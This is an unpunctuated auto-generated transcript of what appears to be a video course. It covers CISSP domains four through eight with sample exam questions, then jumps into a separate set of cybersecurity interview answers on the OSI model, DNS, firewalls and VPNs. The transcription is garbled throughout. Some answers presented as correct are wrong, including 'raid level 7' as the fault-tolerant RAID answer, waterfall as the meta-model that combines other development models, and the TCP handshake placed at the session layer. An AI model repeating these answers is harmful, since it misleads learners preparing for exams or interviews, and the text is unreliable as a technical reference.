Authorized to do so if you look at the cia which we discussed in the module one confidentiality integrity and availability how do we keep data confidential by only allowing authorized users access to that data what are authorized users authorized users of people’s people who have been identified and are allowed access to certain
Resources how do we do that by having an identity and access management platform in place which will be discussed later in the next domain but confidentiality would include i triple a standards i triple aaa starts with identification authentication authorization and accountability identification is identifying the person who they are
Authentication is verifying that they are actually who they claim to be authorization is where the access relationships come into the picture where we once we have authenticated a user we are creating a matrix which allows them access to certain resources to a certain extent some may have read
Only access some may have modify access some may have delete access etc so in this scenario we are talking about access relationships between subjects and objects of a system and who mediates that now when you say reference kernel information flow model or security kernel of firewall in this particular
Scenario for this particular question based on the options that are available we are talking about a rule-based access control system which means that we have created rules of what is allowed into a network and how what is not allowed within the network this can be controlled by using a firewall so this
Can be controlled by using a firewall question three which of the following is not a spam blocking architecture now what is spam and how are you going to block it it can be at the client side it can be on the email server by a way of identified spam filters could be
Application based in this scenario mail blocking services basically you creating a blacklist which will block emails from certain addresses or from certain things so this is not a spam blocking architecture it’s basically a blacklist where you’re blocking emails but spam blocking architecture could either be at
The email server based could be at the client side where they’re using let’s say microsoft outlook express and they’ve created rules within it or could be on an application where you have configured rules over there moving on to domain four now this is where the technicalities come into the picture
Communication and network security the network security domain covers topics focused on protecting the network of an organization so communications tcp channels udp channels the tcp so you come across the osi layer you map the osi layer with the tcp ip layer and see how a data fragment packet is created
Looking at domain four we are talking about the osi layer open systems interconnection compared to the tcp ip or the transmission control protocol over internet protocol models you’re talking about internet protocol itself we are talking about converged protocol software defined networks wireless networks then we are talking about
Securing network components so we talk about firewalls types of firewalls endpoint security network access control devices and we look at them over virtualized networks wipe multimedia looking talked about talking about remote access data communications right so all of this is concerned within domain four now osi and tcp itself could
Take hours for people to understand to people to comprehend how computers work now these are theoretical models and we need to create an understanding of how theory merges with the practical world let’s look at a few questions what is the purpose of using a vpn now the sense
Over here is what is a vpn or a virtual private network how is it created what technologies can be utilized within it what encryption mechanisms can be utilized and why are we creating that encryption mechanism in the first place so is it to secure remote access into a network securely connect two networks
Together secure data tunnels within the network or all of the above so here with a vpn we are basically trying to do everything we are trying to create encrypted tunnel between two systems or two networks where data can be transmitted in a secure manner where man in the middle attacks or network based
Attacks would be mitigated a vpn can secure packets from data link layer onwards to the application layer question two which of the following characteristics are not included in the tcp protocol now what is a tcp protocol tcp is a connection oriented protocol it is a reliable protocol that is utilized
To communicate between our servers in a reliable manner so a tcp protocol being a connection oriented protocol which is reliable in nature so which of the following characteristics are not included connection less protocol that is the udp protocols have this is not included in the tcp protocol question three which
If you remember the previous slide would be the udp protocol a udp protocol is a protocol that is used for its speed rather than reliability when it is real-time processing that is required we use udp so most of our voip communications would happen over udp protocols okay so looking at domain
Number five domain five talks about identity and access management so this ties up with your asset management your risk management because if we go back to the confidentiality integrity and availability aspect of it identity and access management is basically allowing authorized users access to resources by authenticating them and also holding
Them accountable so this becomes the sense of how you’re going to allow people to access the resources that you have in your organization let’s look at what this domain covers it will talk about physical and logical access to assets so servers need to be protected by putting them in a secure server room
Does this restricting access to them and allowing access only to those few people who require access to them once we have secured those servers uh this is where we talk about physical security whereas we got a secure room we are going to monitor that room we will have access
Controls we will have guards monitoring who is getting access or who’s trying to get access to that environment and then you’re going to create logical access as well where we let’s say have swipe cards on the door locks so anyone with logical swipe card can access that particular
Facility you’re also looking at managing identification and authentication of people devices and services so here we are going to talk about authentication mechanisms single authentication multi-factor authentication we are talking about single sign-ons we will talk about federated identity management modules we’ll look at casbi or cloud access service brokers we’ll talk about
Session management from applications and so on so forth we will also talk about third party identity as a service provider where we integrate those identities like open id into our organization and we validate people based on the identity that they have created with those organizations then we talk about access control list which
Would be role based access controls mandatory access controls discretionary access controls attribute-based access controls rule-based access controls and then there are a lot of theoretical models that are integrated in this module which talk about lattice-based approach which will talk about other theoretical models which will help you align how identity and access management
Is implemented in an organization so at this point in time we will also be looking at a life cycle of how identities are managed for example onboarding of people deboling of people termination of employees employees as they move within the organization by getting promotions demotions or changing
Departments and assuming a new role so here we talk about how we can provision an identity how we can de-provision an identity how it is to be managed we are going to create a relationship between the creator of this identity and the approver who is going to be a manager so
Even if somebody is allowed to create an identity they will only create it if they have an approval from appropriate manager so let’s look at questions from domain number five the first one which of the following is the most important factor while selecting a biometric system for securing critical assets now
Here the domain talks about the types of authentication mechanisms there are five types essentially three basic types which talk about something that you know which is a password something that you have a swipe card someone that you are a biometric somewhere that you are location based and something that you do
Like captcha so these are the five basic authentication types or mechanisms that you can utilize in an organization multifactor authentication is having multiple of these options in integrated in our identity and access management module to enhance the security now coming back to biometrics biometrics have positives and negatives amongst
Them so uh with the biometric there are two types that we talk about false race of a rate false acceptance rate and false rejection rate what is a false acceptance rate uh somebody let’s say you are using a thumb print to authenticate people somebody put down their thumbprint the person is not
Actually authorized however it was read incorrectly and the door got unlocked and the person got access to that particular area which is a false acceptance rate a false rejection rate is an author authenticated or an authorized person actually trying their thumbprint but it not getting recognized
Does they did not get access to the area or to the device that they wanted now the question here is which of the following is the most important factor while selecting a biometric system for securing critical assets now would i want to focus on false rejection rate or
False acceptance rate then we also have equal error rate and maximum allowable downtime maximum allowable downtime is if the biometric measure fails and if nobody’s getting access to any of the resources to what level or to what extent would my business be able to tolerate such an outage here the
Correct answer is the false acceptance rate because if an unauthorized person gets access to my devices that’s the worst case scenario if the biometric system is down and nobody’s getting access that may still be acceptable rather than having an unauthorized person getting access to very sensitive data false rejection rate is also
Detrimental to the organization however it is not as bad as having a false acceptance rate introduced in the organization the second question which are the two major factors to measure biometric performance again the question from the previous one far false acceptance rate and fr false rejection rate or fse and
Err ier and far fr and gic they don’t actually relate so the correct answer here is far false acceptance rate and false rejection rate so these are the two major factors false rejection rate may still be a little bit acceptable but a false acceptance rate is not tolerable at all next question a
Commercial application for steganography that is used to identify documents or verify that authenticity is either a digital checksum an md5 hash a digital signature or a watermark now here the keywords matter we are talking about steganography so suddenly people start thinking about hiding data within data
And then if you just isolate the words identified documents or verify their authenticity we basically directly go to a digital signature because that’s what we utilize for a non-repudiation however what the question refers to is an application for stiganography seconography is hiding some element which would be visible only
To known people we can utilize steganography on for to benefit our ourselves or our organization by using it to identify the authenticity of a document so if i i’m going to print out a document maybe a watermark on the document which is not visible to the
Naked eye but when i want to validate the document i would search for that particular watermark and that is the correct answer for this particular question so that’s what domain five is all about all right let’s look at domain number six which is security assessment and testing now this domain is all about
Assessments auditing strategies and testing so uh from this domain what you’re going to take away is talking about internal audits external audits third party audits in the security control testing strategizing about how we implement a vulnerability management system a program within the organization that is reputable consistent and
Measurable can be tied up with other management programs like uh patch management incident management and anything and everything uh that requires a vulnerability assessment like even change management if something is going to change in an organization you can have a vulnerability assessment done before you want to even think about
Allowing it or disallowing that change similarly with penetration testing to validate the vulnerabilities that you’ve identified log reviews having a siem tool that will help you analyze or create a patent analysis of what’s happening within the infrastructure what’s happening within the organization from a security perspective then you’re talking about collecting security
Process data account management when we say account management identity and access management life cycle so onboarding of an employee of voting of an employee the lateral movements of an employee in an organization when they’re getting promoted or they are transferred in from one department to another right
So all of these would come under security assessment and testing to see how those policies are functioning to analyze the effectiveness of those policies does the requirement for conducting vulnerability assessment and penetration tests so let’s look at a few questions on this domain and let’s start off with the
First one which of the following ways requires the involvement of an information security analyst so out of these four options assistance requirements definition system design program development or program testing during which phase would you involve a security analyst now for this we first need to identify why
We require a security analyst what is the job requirement what is the activity that is going to be conducted by a security analyst right so in this scenario the correct answer is program testing in the dev program development phase uh we won’t need an analyst we would need a program manager and
Architects who can develop a particular program who can give it some semblance of what needs to be achieved in the system design it would be again an architect who’s going to develop that system in the systems requirements definition again so in the systems requirements definition it’s a requirement gathering about what is
What you need to adhere to what is going to be the baseline that you’re going to create so from these four options you need to identify where would you place a security analyst right in the exam it’s the most probable answer that you’re looking for it’s not the most idealistic
Answer right so from these four options security analysts would most likely be involved in the program testing phase rather than any other phase the second question which of the following techniques is generally not used for monitoring purposes now when you say monitoring what is monitoring monitoring is looking into logs activities
Anything and everything that has already happened so you are reacting to something that has already happened and which of these following techniques is not used for monitoring so you’re collecting logs you’re analyzing those logs what would be not be utilized a penetration test intrusion detection violation processing or counter measures
Testing right now when you’re monitoring you would monitor a penetration test to analyze if the test was successful or not intrusion detection that’s the first input that you look at for analysis violation processing anything is violated any processes any policies you analyze them and you uh you monitor them
Does you come to know that this has happened in counter-measures testing there’s basically a test of the effectiveness of the counter images that are already implemented at that point in time you may not be monitoring these the software program that acts on behalf of user in their absence to carry out
Operations is known as an agent worm applet or a browser so a program that acts on behalf of a user in their absence to carry out operations is either an agent an appellate or a worm or a browser a browser is nothing but a software that allows you to surf the
Internet a worm is a malicious application that would be more of a nuisance value than anything else an appellate is uh something that allows you interconnectivity an agent is something that will that can be automated used for automated tasks and can run those tasks in the absence of a
Particular user so if you look at these questions understanding what each and every word means understanding and highlighting the keywords in the question itself and then analyzing the scenario that you are placed in and then identifying the most appropriate answer for that particular question that is how
You want to approach a cissp exam looking at the next domain domain number seven and that’s security operations let’s look at what security operations has for us now in security operations you’re looking like looking at a stock a security operation center so your regular volatility management incident management uh problem management change
Management placing controls analyzing all that information so probably having an siem tool configuring the siem tool collecting all those data so identifying event sources what are event sources when i have an siem implemented i am not going to expect the siem to automatically start collecting data all by itself and
Then again i don’t expect the siem tool to understand what kind of data it needs to collect so for me in a security operation center after i’ve installed an siem tool i first need to configure it to identify which devices i want to monitor from which devices i want to collect that information
And where do i want to store it once i have all that information in place after that i’m going to analyze that data to identify if anything has been incorrectly going on or is there any security incident that has happened and those would be raised on incidences and
That would be sent to the sock team for analysis and then an incident response right similarly intrusion detection and prevention logs would be utilized to identify something that may have been missed by the ids ips itself you’re going to place controls for investigations like administrative controls which would be
Policies that you have made then you’ve got criminal laws or some uh if something bad has happened that can be described as a crime based on the law of that land how you’re going to deal with it civil laws regular regulatory laws and industry standards regulatory raws
Would be for example gdpr in the european union right a civil law would be where there is no criminal activity that has happened but let’s say there’s a breach of contract between two organizations and the civil lawsuit has been filed against an organization for breach of service level agreements
Regulatory would be the gdpr act where you have to report to a regulatory body and if there are any flaws you could be fined industry standards iso 27001 pci dss and so on so forth so when you’re looking at these requirements for investigation all of these would have
Prescribed how you’re going to handle that investigation if it is a criminal investigation an organization by itself doesn’t have the right to investigate they have to go to a law enforcement agency and there is a procedure to follow in case of a civil lawsuit there are lawyers who would deal with this
This kind of activity send out notices to the other party then go to a court of law to file a lawsuit over there in gdpr there are timelines on how you’re going to report a breach or how you’re going to report an incident and so on so forth
So in the security operations you’re creating a security operation center in alignment with all of these five requirements you’re going to look at logging and monitoring activities having that siem tool which will identify those devices that you want to monitor collect relevant information that is prescribed based on all those five investigation
Types that we just discussed then you’re looking at when you’re looking at identification of assets you go back to your asset inventory asset register you look at all the assets that you have and then you make your strategy and plan how you want to collect those logs right and then
This module will deal about how do you want to handle and indian access management privilege account management service level agreements and so on so forth so this basically is the day-to-day day-to-day business activity of an organization from a security perspective so you are there to identify incidents as a
Cis you ex won’t be executing this but you would be creating policies revolving all of these aspects so yeah this is what you need to consider this is what you need to strategize upon and this is what you want to advise the organization to what needs to be in place to be more
Effective from a security perspective let’s look at the few questions from this domain how does a subject get access to an object in a multi-level security policy now first we need to understand what a multi-level security policy is we need to understand what a subject is and what an object is let’s
Look at the options first the subject sensitivity label must dominate the object sensitivity label the subject sensitivity label subordinates the object sensitivity sensitivity label the subject sensitivity label is subordinated by the object sensitivity label and to repeat the sensitivity tags again and again the subject sensitivity label is dominated by the object
Sensitivity label too much sensitivity in a single slide however you can see that this just confuses the version of what they’re trying to read and not only you missing what keywords are so people normally focus on a keyword called multi-level security policy and start getting confused in that
While we do disregard what a subject and an object is right so a subject and an object is a relationship that is created between identity and access management subject being the user object being the resource that needs to be accessed by that particular user after which comes a multi-level security policy which is
Basically the access control matrix that you have created between these multiple objects and multiple subjects so for example in this domain you would also talk about theoretical models for access management including lattice based approached where the sensitivity labels come into the picture you would talk about clark
Wilson model you will talk about bella padula model and a few other models right all of them theoretical in nature which can then based on other implementations be implemented in a real-time scenario so all that understanding comes into the picture and then you need to identify how those sensitivity labels in a lattice-based
Approach could allow you to create those labels for your subjects and objects and then the identity and access management tool would become the verification factor where it identifies the labels for the subject and the object and they based on those labels they allow or disallow connectivity or allow
Connections to happen now here the correct answer is that the subject sensitivity label must dominate the object’s sensitivity label so the user should have a sensitivity label that allows them access to the object which has an equivalent sensitivity label so understanding those models becomes very much important not only from an exam’s
Perspective but when you’re creating a policy you basically are going to use these terminologies and you’re going to create a policy around this moving on second question managers of which department are ideal for the development of information security policy for an organization business operation information technology purchase or human resources now managers
Of which department are ideal for development of information security policy for an organization and when we say information security policy we would obviously assume that is the i.t department who’s going to deal with it and it’s the information technology in this r in this case but that’s incorrect
It is the business operation why because right from the first domain so we would be taught in the training for cissp that security needs to enhance the business functionality not the other way around so we are in the business or if we are in the function of conducting a business
Which would offer services and those services that are being offered the business activity that has been conducted should be supplemented by security so those business activities could be conducted in a secure manner at no point in time is going is a security going to be a deterrent to business the
Only reason for us anything to become a deterrent to business is the legality of it if a business is illegal it will not happen or it should not happen however if the business activity is legal then security should not stop that activity from happening security should be
Implemented in such a way that it is the business activity is strengthened there is security embedded within it secure by design and then the business activity goes on so even if you’re a chief information security officer or a security manager and you go and talk with the
The board of directors or the steering committee as the terms you will come across in this training you will understand that it is it’s these people who would define how the business is going to work what kind of business activity you’re going to do and then you provide the example and i’ll
Give you an example here let’s say i’m an online retailer and i want to sell good goods online which is legal i’m selling all legal goods goods now i want security to the team to come in and they would help me to secure the the function of being an online e-tailer if
You will my security team is not going to come and tell me of not to do go into that business or stop some services because they may be insecure right the security team’s requirement is that if i want to sell goods online they need to now create an architecture of devices of
Clouds or whatever is required to make it secure so thus the managers of business operations will always be the ideal department for the development of information security policies they decide what is what the business is going to happen and then the security team just complements it by adding the
Security to it for example just going on with this a website is launched with http the security team comes into the picture and says data in motion needs security so we’re going to convert it into https and at no point in time are they going
To say http is vulnerable so we are not going to do this we rather become a wholesale shop or something like that and i’m just giving an example and rather than me just rambling on let’s move on to the next question question three installing malicious software on the system to allow future backdoor
Access leads to violation of what integrity does it violate the data integrity system user or network now malicious software on a system to allow future backdoor access so what are we doing here we are basically installing a software or an application on a particular system which allows a hacker
A backdoor access to the system so this would violate the integrity of the system itself right the data would be compromised but the data would be compromised because the system got compromised a user doesn’t matter because a backdoor is a backdoor entry where you can get access without even
Logging in as a user and a network is just a way of communication at this point in time but the sense being that system got infected and through that infection you got access to whatever was on that particular system now uh that’s domain number seven domain number eight
Which is the last domain in the cissp exam is software development security sdlc or ssdlc secure software development life cycle right that’s what is discussed in this domain let’s go back to the cissp uh guide and see what this domain would consist of so software development security now you
Can see software development life cycles coming in so they’re going to talk about different life cycles like waterfall model they’re going to talk about agile they’re going to talk about modified waterfall this module also will talk about devsecops devops and anything and everything that would be there with the
Software development lifecycle now when we say software development life cycle the essence of assist is to add another s to the s s dlc the sdlc stands for software development lifecycle the cis adds one more as the secure software development life cycle so as with everything secure by design
Which means security needs to be integrated at every phase of the life cycle and not should it should not be bolted on for example a waterfall model talks about how the software is going to be developed and how it is going to be published or released at the end of the
Life cycle at no point in time does it talk about security does security architect at that point will die at that point in time would come into the picture and decide what are the requirements of the software what uh what are the security vulnerabilities or the risk that they see so threat
Modeling would happen and all those things need to be introduced right from the inception so if there are developers or if there is a business requirement for an application let’s go back to the previous example i’m an e-tailer so to become an e-tailer not do i only need a
Website i will need a web application for that function it will be given out so i need to develop that application in a regular lifecycle model i develop that application and then go into security where i do a vapt on that application find out that there are disastrous
Results and then i go back and start coding again which is not a good scenario so i have hired a cis who will then come into the picture during the sdnc and the inception itself when businessmen are talking about uh how the business is going to happen at that
Point in time the assist will come in and start with a threat modeling exercise saying you know what let’s talk about what are the risks this application is going to face you’re going to handle a lot of payment information because people need to pay for the products right so credit cards
You’re going to be going to be involved there’s a database or sql injection attacks so these are the threads that we’re looking at and now a threat modeling exercise would be followed by a risk assessment then would be looked at upon a by an impact analysis and then
Based on that you will prioritize those risks you will then educate your developers to use secure coding practices at the same time security testing would be done to see how the application is being evolved and then by the time that the software development lifecycle comes to an end you would have
A secure software which had security by design integrated since the inception rather than having voted on now this is the ideal scenario that you’re looking for the expense and the budgeting that’s where the balance of life of capital investments and time to market and all that comments
Comes into the picture but for the training we will always be in an ideal scenario we’ll always have enough time enough resources monetary and human and the exam basically looks at a very ideal scenario in which you got just about everything you just need to make the
Correct decision at no point in time are you going to think that if i start doing a particular strategy it is going to cost me a lot of money so i don’t want to do that that’s the real whole scenario in the real world you look at
The costs you look at the timelines deadlines and then you take a informed decision of how much you want to invest in what in the ideal world for the cisp exam or the cissp exam there are no limitations you are looking at the most correct way
Of doing those things and thus you are you identify those requirements and that’s how you answer the exam so you’re looking at the security software environments that you require configuration management auditing and logging of changes security impact of acquired software now in this scenario we talked about developing a software
What if i purchase a third-party software and i introduce it into my organization now this software when integrated how is it going to impact my current security controls impact my current identity access management my networking my other applications my communications so that’s something that you want to assess as
Well right so let’s go for the questions question one in which of the following raid level the drive array continues to operate even if any disks fails now in the actual exam they are not going to be very technical it’s a managerial exam so they may not ask you these kind of
Questions but the knowledge is still required so you need to know that there is something called raid the different levels of raid because you might want to use that as a solution in a particular thing how do you want to implement rate and all of those that’s not the
Knowledge that we want but in this scenario rate level 7 is the ideal answer question 2 which of the following steps can be utilized uh or can be used to protect an organization against the failure of a critical software firm now basically what does this talk about this
Talks about disaster recovery or this this talks about business continuity for example there’s a failure of some sort when there is something that fails what does it do it interrupts the business so the moment of business interruption happens what should kick in the business continuity plan if the business
Continuity plan fails then the disaster recovery plan kicks in so if you look into it as we go in we might even come against uh terminologies like rto’s rpos return time objective and recovery point objective and at that point in time you want to look at how do we want to
Recover from a data loss and does you will come across solutions now of the four options full backups differential backups and incremental backups and the fourth one software escrow agreement what is the difference between these a full backup is a complete backup of the entire data that
You have taken now it sounds easy but in an organization data could be terabytes petabytes and to do a complete backup might take days weeks or a lot of time right it’s not just copying one megabyte from a hard disk to a usb drive and be done with the backup
So full backups may be possible but not on a regular basis so maybe you do a full backup every week which means that at the end of the week if the data loss happens then you have lost the data for an entire week because the backup was
Last week thus it’s not a very good solution and to complement that we could use incremental backups and differential backups right so the training would include all of these definitions of what these backups are what happens and then the fourth option software escrow agreement what is that now in a software
Development or a software lifecycle if i have purchased a software from a third party my biggest risk is not of me getting hacked or the the software getting hacked from a business continuity the biggest risk is if the software provider goes bankrupt or is taken over by somebody else or stops
Supporting the software then what what am i to do because i may have invested millions of dollars or reinvesting into a different product and migrating to a different product would be expensive very costly and need to be very time consuming so what do i do at that point
In time so there is an option for software escrow agreement what does that mean that the source code of that software is placed in an escrow which means let’s say in a bank where the bank will hold the soft the source code in a secure manner and the source code cannot be accessed
Or by be modified either by the developing organization or the purchasing organization so it just sits with the bank if the developers go out of business or they stop supporting at that point in time the escrow can be opened and the purchaser that that’s us in this case can still get the source
Code so now we can develop the software or we can go into the source code analyze and save ourselves from a disaster right so these are the four options now here you’re talking about the critical software from that field you’re not talking about data that failed so the correct answer here is the
Software escrow agreement right question number three now here we come across the word development model which one of these is a meta model that incorporates several other software development models are we looking at waterfall modified waterfall spiral or critical patch but here the correct answer is a waterfall model we
Are going to look at 10 different questions on networking then we’ll have 10 more questions on software and programming under the 20 questions on operating systems and applications 10 questions on cyber attacks and then the finally 10 questions on cryptography so we’re going to discuss over 50 odd
Questions each in these different fields which will help you crack your interviews as far as cyber security is concerned let’s start off with networking questions let’s start off with question one what is the osi model explain the different layers of the osi model osi largely is a theoretical model
Utilized to understand networking and how data packets are created and how they are being processed by a computer this is normally used by the tcp the transmission control protocol over internet protocol software suite so osi is known as the open systems interconnection model it is a reference model that describes how applications
Are going to interact via the computer network there are seven different layers that we need to understand they are as follows so in this diagram there are these seven different layers we start off from the bottom first is the physical layer the data link layer network layer transport layer session layer presentation and
Application when such a question is asked in an interview it is not only that we identified these seven layers explaining what the osi model is in the first place we then try to identify the seven layers and we give a brief description about each and every layer if there are any additional
Questions they will come after this basic question so let’s start off with the physical layer this is the lowest layer of the osi model now this is where any and every physicality of your computer comes into the picture so it could be a network interface card it could be an
Rj45 or a cat5 cable anything that allows data to be transmitted physically from your machine to another machine next comes the data link layer so on the data link layer as far as networking is concerned we just need to understand that data packet is encoded decoded into bits at this layer this is
Also the layer that deals with mac addressing so the physical address of every network network interface card which is the mac address which is utilized to route data packets over the network this is where the mac address resides on the data link layer the next layer is the network layer
Here datagrams are transferred from one to another the function of this layer are routing and logical addressing the moment we talk about routing and logical addressing ip addresses come into the picture ip version 4 ip version 6. so network layer will deal with ip addressing and the routing of those packets
Then comes the transport layer this is the layer responsible for end to end connections that automatically signifies that this is where tcp and udp will be working tcp stands for transmission control protocol udp for user datagram protocol tcp is a connection oriented protocol whereas udp is a connectionless protocol
These two protocols are utilized to establish connectivity between two machines tcp is a more reliable method of connectivity because there are a lot of packets that are sent across to verify that the data has been sent data has been received and so on so forth whereas udp is a connection less protocol where
Data is just dumped without verifying whether the receiver actually receives that data or not so in a nutshell on the transport layer tcp and udp make their appearance and this is where that functionality lies then comes the section there this controls signals between the computer it establish maintains and terminates connections between processes
So in the transport layer we talked about tcp and udp udp being a connection less protocol where data is just transmitted without verifying whether the receiver received that data or not whereas tcp we studied is more of a reliable protocol thus there are different packets signals that
Will be sent across to verify that data has been transmitted it has been received properly and then the next segment of that data is being sent so those control signals are established using the session layer so the three-way handshake of tcp the acknowledgement packets and those kind of packets will be taken
Taken care of on the session layer of the osi model then comes the presentation layer the presentation layer is responsible to translate data into the application layer format so the formatting right mime or encoding that is being utilized the utf-8 character set that we utilize for presentation encryption mechanisms all of these work
On the presentation layer and finally comes the application layer where the application itself uses a particular protocol so that the other uh machine on the receiving end the application on that machine would be able to understand what the communication was about right so in a nutshell
If if i start from up top the application layer will deal with any of the data that the application uh is generating so maybe an user input you’re logging in you’re typing the username password all that data will be constructed let’s say into an http or https format that’s where application
Layer comes into the picture then the formatting of which into utf-8 and the encryption of which would be done at the presentation layer then this transport layer and the session layer would kick in to establish a tcp session do the three-way handshake establish that connectivity ip addressing would be done on the network
Layer mac addressing would be done on the data link layer and when everything is ready on the physical layer the packet will be sent out at the receiving end the packet will be received on the physical layer and then all these layers will be reversed and finally at the
Application layer the data would be presented to the application who would then execute it and showcase it on the screen of the recipient so this is the way you want to explain this question you want to be very concise precise about what you’re explaining you don’t want to go into two
Hypothetical scenarios you don’t want to delete earlier with the layers you just want to give the basic functionality want to demonstrate that you understand what the osi layer is how the computer functions and you want to move on from there if the interviewer has any further follow-up questions they will ask those
Specific questions so that’s question one moving on to the question two question two is define unicasting multicasting and broadcasting now this is a question which can be very lengthy but again most of your interview questions are designed that way it’s basically to understand how much conceptually you are
Aware about these technologies so you have to be very concise don’t go uh rattling about technology too much but in a concise manner just try to explain what these things is so when data is being transmitted over a network it can be transmitted either in one of these particular manners it can either
Be a unicast multicast or a broadcast so what is unicost unicast is when a message is sent from a single user to a single receiver so one to one right so uh one machine talking to another machine and nobody else so also known as point-to-point communications one point
To one of the point if you have to send information to multiple receivers then you will have to send it using multicast right so this is where your multicast networking comes into picture so in our case uh let’s assume it’s a network where there are there’s a class c network approximately
255 odd machines and within these there are two machines that want to talk to each other if they want to talk between each other it would be a point to point communication where they will utilize unicast where only these two machines will have visibility of that conversation and the other machines will
Not even realize that this conversation is taking place if one machine wants to talk to multiple machines then the multicast comes into the picture as the name suggests in this mode of communication data is sent from one or more or more sources to multiple destinations multicast uses the internet group
Management protocol also known as the igmp protocol to identify groups so under this igmp protocol various groups are created where machines are subscribed to those particular groups and whenever a message needs to be sent through those groups it will be identified by the igmp protocol and then that particular
Message will be sent to those multiple machines that are members of those particular groups and then comes the broadcast the third method is known as the broadcast as it says it is going to broadcast to all so this is one to all that is communication between a single
User and it is going to be sent to all the machines in that particular network right so the three ways unicast is one two one multicast is one to many and broadcast is one to all then question number three what is dns dns stands for domain name system it is
Like the internet’s phone book that is responsible for mapping the domain name into its corresponding ip address and let me give you an example over here whenever we go and open up let’s say a browser a google chrome browser we type in www.google.com and then we press enter and magically
Google comes in front of us the website rather now how does the computer know who google is because as far as we are concerned humans understand google and words like that computers don’t computers deal with binary zeros and ones right and as far as internet is concerned they
Will only deal with ip addresses and mac addresses so how does a computer know how to find google.com and where is it located so the moment we type in the browser window in the address bar google.com and press enter a dns query is generated automatically by the
Browser where a packet is sent to our dns servers asking what the ip address is so in short dns resolves domain names to their corresponding ip addresses there is a dns server which will have this index a database of all the domains associated with their ip addresses
If one particular dns server does not have that information that you’re looking for it may query another dns server who may have that particular response so the first thing is when you type in domain name it gets resolved with the dns it identifies the ip address corresponding
To that particular domain name and thus allows the computer to route that packet to the particular server where that domain name resides so in this scenario if you look at the screen on the local pc you have typed in cybersecurity.com there’s a dns resolution that a query
That goes to the dns server what is the ip of cybersecurity.com the dns server looks it up in its particular database if it has the corresponding ip address it will then respond back the ip addresses 172.17.252.1 after which the packet is sent off to cybersecurity.com moving on to question
Number four what is a firewall now this is a very good question and normally a very basic answer that i’ve ever heard is that a firewall is a hardware and a software firewall but that’s the functionality of a firewall that is what how we can install a firewall but there are different types
Of firewalls and there is a specific functionality that the firewall is created for right so firewall is either a hardware or software but its responsibility is for blocking either incoming or outgoing traffic from the internet to your computer they secure a network so essentially the firewall will allow a connection to
Happen or disallow a connection to happen it won’t go beyond that that’s the basic functionality of a firewall okay so based on the configurations that you have done based on the rules that you have created on the firewall it will then based on those rules identify whether some traffic is
Allowed in that network or some traffic is to be blocked from entering that network so as the screen shows the firewall rules will analyze whether the traffic is good if yes it will allow if the traffic is bad it will block the traffic and not allow that connection from happening in
The first place now there are few common types of firewalls that also need to be included in the answer to this question and the first one is a packet filtering firewall these are the most common types that you will come across which analyze packets and lets them pass through only if they
Match and establish security rule set now here people do get confused when we say that we analyze packets people think that these firewalls will analyze the contents of that packet which is not correct when the definition for a packet filtering firewall says that these firewalls analyze packets it means that
They are only analyzing the source and destination ip addresses port numbers and the protocols that are mentioned in those packets these firewalls do not have the capability of deep packet inspection or a dpi as it is known if that capability comes into the picture you are basically looking at an intrusion detection system
Or an intrusion prevention system in today’s world called as a next-gen firewall okay so a packet filtering firewall essentially will only analyze data packets for its source and destination ip addresses port numbers and the protocol that is being utilized it will then map that information to the rules
That are there on the firewall and based on those rules it will either allow that a connection to happen or disallow that connection from happening the second type of is a proxy firewall these firewalls filter network traffic at the application level so when you say application level they work at the layer
7 of the osi model packet filtering firewalls since we have mentioned that they’ve worked on ip addressing and port numbers will work on the network layer of the osi model also on the transport layer because you also look at protocols proxy firewalls will work at layer 7 which is the
Application layer of the osi model and will deal with application level protocols such as http https ftp smtp and so on so forth and the third one is a stateful multi-layer inspection firewall these filter packets are the network transport and application layers so they basically do
The job of the first and the second type of firewalls the packets are compared to known uh trusted packets but now the first question is if there is a stateful multi-layer inspection firewall why do we have type one and type two firewalls like packet filtering and proxy
Firewalls that is because that is how the firewalls have evolved we started off with the packet filtering then we added functionality to it and so on so forth so if a question comes what is a firewall you start off with the option saying it is a hardware or
Software this is the responsibility the functionality of a firewall is to allow good traffic and disallow bad traffic based on the rules that have been configured on the firewall and then you’ve got basically three types of firewalls packet filtering proxy and stateful multilayer and just include a brief description of each of these
Firewalls if getting your learning started is half the battle what if you could do that for free visit skill up by simply learn click on the link in the description to know more then moving on to question number five what is a vpn vpn is also called a virtual private
Network it is a connection between a vpn server and a vpn client so it basically creates an encrypted terminal between the client and the vpn server which is then utilized to secure the connections that you’re making with the internet so as you can see in the diagram
The user has a vpn client installed on the machine the vpn client then creates an encrypted tunnel to the vpn server and through this tunnel encrypted data is transmitted which can then be processed by the vpn server uh sent to the internet information can receive can be received back by the vpn
Server the vpn server will encrypt that data back and send it back to the user so if there is a man in the middle attack that is happening or a hacker trying to eavesdrop on the communication mechanism they will not be able to do so because of the encrypted terminal it is
Very difficult to decrypt this or hack through this encrypted tunnel it is possible but it is very difficult to achieve that moving on to question number six what are the advantages of distributed processing now before we go into advantages of distributed processing we first have to understand what is distributed processing
So it is a term which describes various computer systems that use more than one processor to run an application here multiple computers across different locations share the same processor the advantages of distributing processes are as follows but before we go into the advantages distributed computing is basically where multiple machines will pool their
Resources together to run a singular application so an application that has multiple resources and can scale up and scale down as and when required the advantages are that it can be very very useful in data recovery for example raid where you’re striping data on various hard disks it is reliable it is cheaper
Lower cost can be achieved and it is easy to expand because of the scalability factor that we just talked about if there is loss of data in one computer it can then be recovered by another interconnected computer and one of the examples would be blockchain in today’s world right what is blockchain
That this data is uh created live and stored on a connection of computers so if one of the computers goes offline the other computers in that network will still have that data and the blockchain will still function without any issues the second point a glitch in one machine does not affect
The processing as there will be multiple other machines like we discussed in the blockchain several cost effective mini computers are used instead of costly or mainframe machines so instead of having a server bank i can have multiple machines connect interconnected together and they can function in that particular blockchain or for
That particular distributed processing mechanism depending on the amount of data processing more computers can be attached to the network thus you can increase the number of computers that can be a part of that blockchain or you can reduce them as and when necessary moving on to question number seven what is tcpip
Tcpip or transmission control protocol over internet protocol is a set of communication protocols that are used to interconnect networking devices on the internet this protocol defines how data should be transmitted over the internet by providing end-to-end communications so essentially if you want networking to be established on your machine you will need tcp
Without tcp ip there will be no work groups there will be no domains basically your interconnectivity will go for a toss tcp is a software that once installed on your machine will then interact with the hardware which is your network interface cards and then your switches wires cables and all those through protocols
That have been already pre-configured in it so within the tcp suite of softwares you will have all the protocols all the functionality of the osi layer and each and every protocol that works on each and every layer will be predefined and pre-configured to work in a particular manner the internet
Protocol is all about routing each individual packet to make sure it reaches its destination so with the tcp you’re talking about the protocols that will allow you to format the data and generate it so that you can communicate it over the network the ip will then deal with the routing of those packets
